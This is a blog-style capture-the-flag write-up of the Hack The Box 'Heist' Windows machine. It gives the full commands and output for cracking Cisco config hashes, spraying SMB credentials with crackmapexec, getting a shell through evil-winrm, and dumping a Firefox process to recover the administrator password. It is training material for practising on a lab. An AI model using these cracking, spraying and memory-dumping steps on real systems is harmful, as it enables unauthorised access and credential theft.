---
title: "Heist Hackthebox"
date: 2021-03-18T22:11:40+01:00
draft: false
image: "/static/HACKING/heist-icon.png"
categories:
    - Hack-The-Box
---

![<- Not working](/static/HACKING/heist-index.jpg)

# [*] INDEX: 

- [BOX INFO](#-box-info--)
- [GAINING ACCESS](#-part-1---gain-access)
- [PRIVILEGE ESCALATION](#-part-2---privesc)

# [+] BOX INFO 💻 :

```
BOX INFO 💻 :

Operative System : Windows 🌐
Difficulty : Easy 🌔
Owner : MinatoTW
IP : 10.10.10.149
```

# [+] PART 1 - GAIN ACCESS

To get a fast scan, we're using this command to discovery ports:

`nmap -p- --open -T5 -n 10.10.10.149`

But this script is running soooo slow, so let's make some changes :

`nmap -p- --open -n --min-rate 5000 10.10.10.149`

```
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
49669/tcp open  unknown
```

Once seen that, let's get a deeper scan on those ports : 

`nmap -sC -sS -sV -p80,135,445,5985,49669 10.10.10.149`

```s
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp   open  msrpc         Microsoft Windows RPC
445/tcp   open  microsoft-ds?
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-03-18T21:30:10
|_  start_date: N/A
```

Okay we can see a website, samba server and other not really relevant services right now. Let's check samba :

First of all we'll be trying to login with a null session but it doesn't work :( 

`smbclient -L //10.10.10.149/`

```
Enter WORKGROUP\Maiky's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
```
So, once seen that, let's check the website :

![<- Not working](/static/HACKING/heist-1.png)

There's a login page but we don't have any creds, so let's login as guest : 

![<- Not working](/static/HACKING/heist-2.png)

Hazard is saying he has some problems with his cisco router, and there is an attached file : 

```
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
```

Interesting... Here we can see 5 users and 3 hashes to crack, and as Hazard said, these are cisco encrypted hashes : 

```
# Users
rout3r
admin
secret
security
hazard

# Hashes
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
```

There are two main types of hashes in cisco, type 7 (the most common) and type 5 (this is kinda more difficult to crack, this we'll need to brute force). 

Let's go first with type 7's. After a little research I found a github script : `https://github.com/theevilbit/ciscot7`

`python ciscot7.py -d -p 0242114B0E143F015F5D1E161713`
```
Decrypted password: $uperP@ssword
```

`python ciscot7.py -d -p 02375012182C1A1D751618034F36415408`
```
Decrypted password: Q4)sJu\Y8qz*A3?d
```

And about type 5's, I'll use john to crack it: 

`john --wordlist=/usr/share/wordlists/rockyou.txt hash`
`john hash --show`

```
?:stealth1agent

1 password hash cracked, 0 left
```

Nice, let's try to bruteforce with this the samba server, we'll be using crackmapexec :

`crackmapexec smb 10.10.10.149 -u users.txt -p passwords.txt`

```
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\hazard:stealth1agent
```

Oh yeah! So let's try to login into smb with this creds :
```
hazard:stealth1agent
```

We should keep ennumerating smb users, we'll be using impacket and the script lookupsid.py `https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/lookupsid.py`: 

`python3 lookupsid.py hazard@10.10.10.149`

```
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
```

So some new users! -> Chase & Jason, Let's try to run crackmapexec again (now we have to remove hazard from the wordlist because the script stops once it finds a valid username&password)

`crackmapexec smb 10.10.10.149 -u users.txt -p results.txt`

```
SMB         10.10.10.149    445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\security:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\admin:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\rout3r:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Jason:4dD!5}x/re8]FBuZ STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.10.10.149    445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d
```

Let's try to log into the machine, in my case, I'll be using evil-winrm to connect to the port 5985 wsman-> `https://github.com/Hackplayers/evil-winrm` :

`./evil-winrm.rb -i 10.10.10.149 -u Chase`

```
Enter Password: 

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents> 
```

And, WE'RE IN!

# [+] PART 2 - PRIVESC

To be honest I'm a absolute noob about Windows Privilege Scalation, so I followed this : `https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---processes-enumeration-and-tasks`

After a long reserch, enumerating system processes I found this :

`*Evil-WinRM* PS C:\Users\Chase\Documents> Get-Process`

```
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    484      18     2296       5340               380   0 csrss
    289      13     2252       5096               488   1 csrss
    360      15     3472      14436              4996   1 ctfmon
    250      14     3924      13220              3824   0 dllhost
    166       9     1880       9816       0.02   7032   1 dllhost
    623      35    31256      58204               976   1 dwm
   1492      57    23468      79396               968   1 explorer
    378      28    24796      62044       0.88   2504   1 firefox
    355      25    16348      38920       0.22   4408   1 firefox
   1079      75   181268     534248       8.02   6708   1 firefox
    347      20     9924      34688       0.06   6828   1 firefox
    401      35    40640      99708       1.00   6964   1 firefox

[...]
```

Hmmm, firefox is not a usual process in Windows, maybe it's running as Administrator and we can dump the process and see what's going on inside. We'll use procdump -> `https://github.com/Sysinternals/ProcDump-for-Linux` : 

To upload it we'll just go to the firefox file directory and upload it directly from the evil-winrm : 

`*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla> upload /local/path/to/file/procdump64.exe`

Let's run it :

`*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla> ./procdump64.exe -ma 6708` # 6708 is the process ID, we got it from "Get-Process"

Once done this we got this file : 

```
-a----        3/19/2021   4:58 AM      543248937 firefox.exe_210319_045808.dmp
```

We can't read the file, so let's run a "strings" to it, in my case I downloaded it from here -> `https://download.sysinternals.com/files/Strings.zip`

And we'll upload it at the same way as procdump : 

`*Evil-WinRM* PS C:\Users\Chase\appdata\roaming\Mozilla> upload /local/path/to/file/strings64.exe`

And we run it : 

`*Evil-WinRM* PS C:\Users\Chase\appdata\Roaming\mozilla> cmd /c "strings64.exe firefox.exe_210319_045808.dmp > dumped_info.txt"`

I've tried to read dumped_info.txt but it was toooooo long, so I'll try luck filtering by "password" : 

Looking into the file I found this :

```
-os-restarted localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
```

So, maybe password is "4dD!5}x/re8]FBuZ" ? Let's try : 

`./evil-winrm.rb -i 10.10.10.149 -u Administrator`

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
```

# THANKS FOR READING!!
















